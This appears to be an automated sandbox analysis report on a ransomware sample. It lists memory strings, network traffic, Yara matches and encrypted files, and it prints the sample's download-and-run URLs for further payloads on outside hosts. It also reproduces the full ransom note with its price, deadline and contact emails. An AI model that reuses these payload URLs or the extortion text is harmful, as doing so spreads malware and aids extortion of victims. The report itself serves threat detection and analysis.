        Source: C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true(y
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/fhsgtsspen6/get.phpCoder
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/files/1/build3.exe
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/files/1/build3.exe$run
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/files/1/build3.exe$run10.08.2019
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://securebiz.org/files/1/build3.exer
        Source: C0XWmZAnYk.exe, 00000006.00000003.2316998230.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317259186.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317364588.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317448313.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
        Source: C0XWmZAnYk.exe, 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317528873.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317614991.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317686785.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
        Source: C0XWmZAnYk.exe, 00000006.00000003.2317750484.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://znpst.top/dl/build2.exe
        Source: C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://znpst.top/dl/build2.exe$run
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://znpst.top/dl/build2.exe:
        Source: C0XWmZAnYk.exe, 00000009.00000002.2202422051.0000000000638000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000003.2276097000.0000000000759000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.000000000075B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
        Source: C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000747000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.0000000000795000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2277024128.00000000007AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
        Source: C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json)VZY$
        Source: C0XWmZAnYk.exe, 00000002.00000002.2063725097.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683012992.00000000008C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json-
        Source: C0XWmZAnYk.exe, 00000006.00000002.2683012992.00000000008C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json=
        Source: C0XWmZAnYk.exe, 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonA
        Source: C0XWmZAnYk.exe, 0000000C.00000003.2276097000.0000000000759000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.000000000075B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsoni
        Source: C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonl
        Source: C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonm
        Source: C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp2
        Source: C0XWmZAnYk.exe, 00000009.00000002.2202422051.00000000005F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
        Source: C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsont_
        Source: C0XWmZAnYk.exe, 0000000C.00000003.2276097000.0000000000759000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.000000000075B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsony
        Source: C0XWmZAnYk.exe, 00000009.00000002.2202422051.00000000005F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonz
        Source: C0XWmZAnYk.exe, 00000009.00000002.2202422051.0000000000682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json~
        Source: C0XWmZAnYk.exe, 00000006.00000002.2684111826.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-2zbBkO06
        Source: C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-2zbBkO06X
        Source: C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000098B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.000000000098B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-2zbBkO06mv
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,2_2_004822E0

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-2zbBkO06mvPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:manager@mailtemp.chReserve e-mail address to contact us:supporthelp@airmail.ccYour personal ID:0335gSd743dgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1Jump to dropped file
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 2684, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 6776, type: MEMORYSTR
        Source: Yara matchFile source: 2.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.C0XWmZAnYk.exe.c115a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.C0XWmZAnYk.exe.c315a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.C0XWmZAnYk.exe.c115a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.C0XWmZAnYk.exe.ca15a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.C0XWmZAnYk.exe.c315a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.C0XWmZAnYk.exe.ca15a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 1400, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 3208, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 6512, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 7084, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 2684, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 6776, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 4536, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 6360, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 6984, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: C0XWmZAnYk.exe PID: 5260, type: MEMORYSTR
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile moved: C:\Users\user\Desktop\EFOYFBOLXA\EOWRVPQCCS.mp3Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile deleted: C:\Users\user\Desktop\EFOYFBOLXA\EOWRVPQCCS.mp3Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile moved: C:\Users\user\Desktop\TQDFJHPUIU.jpgJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile deleted: C:\Users\user\Desktop\TQDFJHPUIU.jpgJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile moved: C:\Users\user\Desktop\EIVQSAOTAQ.jpgJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-2zbbko06mvprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:manager@mailtemp.chreserve e-mail address to contact us:supporthelp@airmail.ccyour personal id:0335gsd743dgigf2elyocnmqz77lhepsoxvtyp2junk9hzftjt1Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99773041632Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99776647214Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json entropy: 7.99879002601Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json entropy: 7.99154438439Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite entropy: 7.99592896552Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm entropy: 7.99455322499Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite entropy: 7.99616476726Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm entropy: 7.99451666788Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite entropy: 7.99632450954Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm entropy: 7.99350504413Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite entropy: 7.99645219663Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json entropy: 7.99195808142Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif entropy: 7.99733210353Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\verified_contents.json entropy: 7.99057918083Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm entropy: 7.99492823227Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm entropy: 7.99500112664Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite entropy: 7.99601094129Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm entropy: 7.9938662411Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png entropy: 7.99067036027Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png entropy: 7.99296278507Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.9973563103Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99613662509Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99345786007Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99139558981Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99273893534Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99284826368Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99678805295Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005953011714.txt entropy: 7.99773272312Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db entropy: 7.99796321266Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db entropy: 7.99827750981Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99742654722Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005389384955.txt entropy: 7.9979610875Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409005089393222.txt entropy: 7.99821629557Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004786866416.txt entropy: 7.99814825295Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004610890001.txt entropy: 7.99822987916Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409004157646270.txt entropy: 7.99807745748Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409003693874026.txt entropy: 7.9980624072Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409003495205506.txt entropy: 7.99836826686Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409000886124092.txt entropy: 7.99824298443Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db entropy: 7.99810147388Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.992747066Jump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409006446553451.txt entropy: 7.99823002984Jump to dropped file
